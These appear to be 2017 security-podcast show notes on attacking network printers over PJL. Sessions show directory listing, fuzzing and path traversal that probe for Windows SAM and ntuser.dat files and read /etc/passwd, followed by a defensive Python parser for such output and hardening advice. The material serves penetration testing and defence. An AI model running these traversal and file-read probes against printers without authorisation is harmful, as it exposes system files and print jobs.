Paul’s Printer Hacking Adventures – Paul’s Security Weekly #525

August 15, 2017

Printer attacks have been around for some time. Paul describes some of the latest techniques and research into printer hacking, including capturing print jobs, manipulating print jobs and other attacks. These are useful on penetration tests (believe it or not). Defenders take note: printers must be on your radar.

Run PJL Commands:

printer:/> site @PJL INFO STATUS
CODE=10001
DISPLAY="Ready"
ONLINE=TRUE

Debug mode shows you the underlying commands, very useful for learning more PJL and PS attacks:

192.168.1.197:/> debug
192.168.1.197:/> Debug mode on

192.168.1.197:/> ls
192.168.1.197:/> @PJL FSDIRLIST NAME="0:/" ENTRY=1 COUNT=65535
No data received.

Some printers just don't have a filesystem:

printer:/> ls
No data received.
printer:/> ls ../..
No data received.
printer:/> info filesys
"?"

The "?" means there is no filesystem inside the firmware, according to the PJL documentation. And yes, I read the PJL documentation, it was awesome, you should read it too! #RTFMFTW You can't launch many "actual" attacks unless there is a file system, e.g. capturing print jobs. You can test for the presence of volumes like this:

printer:/> info filesys
VOLUME   TOTAL SIZE     FREE SPACE    LOCATION LABEL    STATUS
0:            67092416Kbytes  67085856Kbytes    		    READ-WRITE

You can also use the fuzz command:

printer:/> fuzz path
Checking base pathes first.
PATH                                                     EXISTS  DIRLIST
────────────────────────────────────────────────────────────────────────
0:/                                                      True    True   
Listing directory.
d        -   PJL
d        -   PostScript
d        -   saveDevice
d        -   webServer
PJL Error: Vol name out of range
PJL Error: Vol name out of range
                                                         False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
.                                                        False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
                                                        False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
/                                                        False   False  

You can also fuzz for file names:

printer:/> fuzz blind
Blindly trying to read files.
PATH                                                     GET     EXISTS 
────────────────────────────────────────────────────────────────────────
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%WINDIR%win.ini                                         False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%WINDIR%repairsam                                      False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%WINDIR%repairsystem                                   False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%WINDIR%system32configsystem.sav                      False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%WINDIR%System32driversetchosts                      False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%SYSTEMDRIVE%boot.ini                                   False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%USERPROFILE%ntuser.dat                                 False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%SYSTEMDRIVE%pagefile.sys                               False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%SYSTEMROOT%repairsam                                  False   False  
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%SYSTEMROOT%repairsystem                               False   False  
────────────────────────────────────────────────────────────────────────
PJL Error: File not found
PJL Error: File not found
0:/.profile                                              False   False  
PJL Error: File not found
PJL Error: File not found
0:/../.profile                                           False   False  
0:/../../.profile                                        True    True   
PJL Error: File not found
PJL Error: File not found
0:/.../.profile                                          False   False  
PJL Error: File not found
PJL Error: File not found
0:/.../.../.profile                                      False   False  
PJL Error: File not found
PJL Error: File not found
0:/..../.profile                                         False   False  
PJL Error: File not found
PJL Error: File not found
0:/..../..../.profile                                    False   False  
PJL Error: File not found
PJL Error: File not found
0:/etc/passwd                                            False   False  
PJL Error: File not found
PJL Error: File not found
0:/../etc/passwd                                         False   False  
0:/../../etc/passwd                                      True    True   
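
For defenders triaging saved output like the sessions above, this added Python example (not part of the original show notes or of the tool shown in them) reports whether a device exposes a filesystem volume, whether it is writable, and which `..` paths a fuzz run marked as readable, meaning paths that climb above the volume root. The sample strings are constructed from the output above, and the names `parse_filesys` and `traversal_hits` are hypothetical.

```python
import re

# Constructed sample inputs, modelled on the session output shown above.
NO_FS = '"?"'
WITH_FS = (
    "VOLUME   TOTAL SIZE     FREE SPACE    LOCATION LABEL    STATUS\n"
    "0:            67092416Kbytes  67085856Kbytes    \t\t    READ-WRITE\n"
)
FUZZ = """\
PJL Error: File not found
0:/.profile                                              False   False
0:/../../.profile                                        True    True
PJL Error: File not found
0:/etc/passwd                                            False   False
0:/../../etc/passwd                                      True    True
"""

VOLUME_ROW = re.compile(r"^(\d+:)\s+(\d+)\s*Kbytes\s+(\d+)\s*Kbytes\s+(.*?)\s*([A-Z-]+)\s*$")
FUZZ_ROW = re.compile(r"^(\S+)\s+(True|False)\s+(True|False)\s*$")


def parse_filesys(text):
    """Return one dict per volume row; an empty list means no volume (e.g. "?")."""
    volumes = []
    for line in text.splitlines():
        m = VOLUME_ROW.match(line)
        if m:
            vol, total, free, _label, status = m.groups()
            volumes.append({"volume": vol, "total_kb": int(total),
                            "free_kb": int(free), "writable": status == "READ-WRITE"})
    return volumes


def traversal_hits(text):
    """Return paths with a ".." segment that the fuzz run marked True in either column."""
    hits = []
    for line in text.splitlines():
        m = FUZZ_ROW.match(line)  # error lines such as "PJL Error: ..." do not match
        if m and "True" in m.groups()[1:] and ".." in m.group(1).split("/"):
            hits.append(m.group(1))
    return hits


if __name__ == "__main__":
    print("no filesystem:", parse_filesys(NO_FS) == [])
    print("volumes:", parse_filesys(WITH_FS))
    print("traversal hits:", traversal_hits(FUZZ))
```

A printer that reports a READ-WRITE volume or any traversal hit belongs on the list for firmware updates, restricted access to its raw printing port, and network segmentation.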
